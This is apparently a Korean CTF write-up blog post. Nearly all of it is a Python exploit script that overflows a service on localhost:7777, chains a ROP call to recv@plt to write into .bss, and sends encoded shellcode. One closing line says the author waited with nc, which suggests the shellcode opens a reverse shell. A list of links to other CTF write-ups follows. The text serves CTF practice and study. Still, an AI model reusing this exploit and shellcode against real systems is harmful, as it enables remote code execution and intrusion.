#!/usr/bin/python from socket import * from struct import pack from time import sleep p = lambda x : pack("<L", x) recv_plt = p(0x08048780) bss = p(0x0804b0a0) shellcode = "\xdb\xd6\xbb\xed\x91\xd8\x8f\xd9\x74\x24\xf4\x5e\x33\xc9" shellcode += "\xb1\x12\x31\x5e\x1a\x03\x5e\x1a\x83\xee\xfc\xe2\x18\xa0" shellcode += "\x03\x78\x01\x90\xf0\xd4\xaf\x15\x7e\x3b\x9f\x7c\x4d\x3c" shellcode += "\x84\xde\x25\x42\x3a\xdf\xb4\xda\x52\xc1\xd7\x44\xf1\x97" shellcode += "\x07\xd8\xa5\xee\xc9\x99\x2f\x97\x51\xd3\x2f\x0e\xe5\x32" shellcode += "\x9f\x8e\x24\x44\x96\x89\x4f\x15\x40\x45\x9f\xe5\xf8\xf1" shellcode += "\xf0\x6b\x91\x6f\x86\x8f\x31\x23\x11\xae\x01\xc8\xec\xb1" payload = "" payload += "write" payload += "\x41"*0xf0 payload += recv_plt payload += bss payload += p(4) payload += bss payload += p(len(shellcode)) payload += p(0) s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost', 7777)) s.recv(1024) s.send(payload+"\n") sleep(1) s.send(shellcode) s.recv(1024) s.close() |
한쪽에서 nc로 대기하고 다른쪽에서 exploit 실행 햇습니당
'General News > Write-Ups' 카테고리의 다른 글
| HackIM nullcon 2015 exploitation100 (0) | 2015.01.11 |
|---|---|
| ChristmasCTF ALGO200 (0) | 2014.12.26 |
| CSAW CTF 2014 Pybabies (0) | 2014.09.26 |
| ropasaurusrex (1) | 2013.12.06 |
| codegate junior ctf (0) | 2013.07.27 |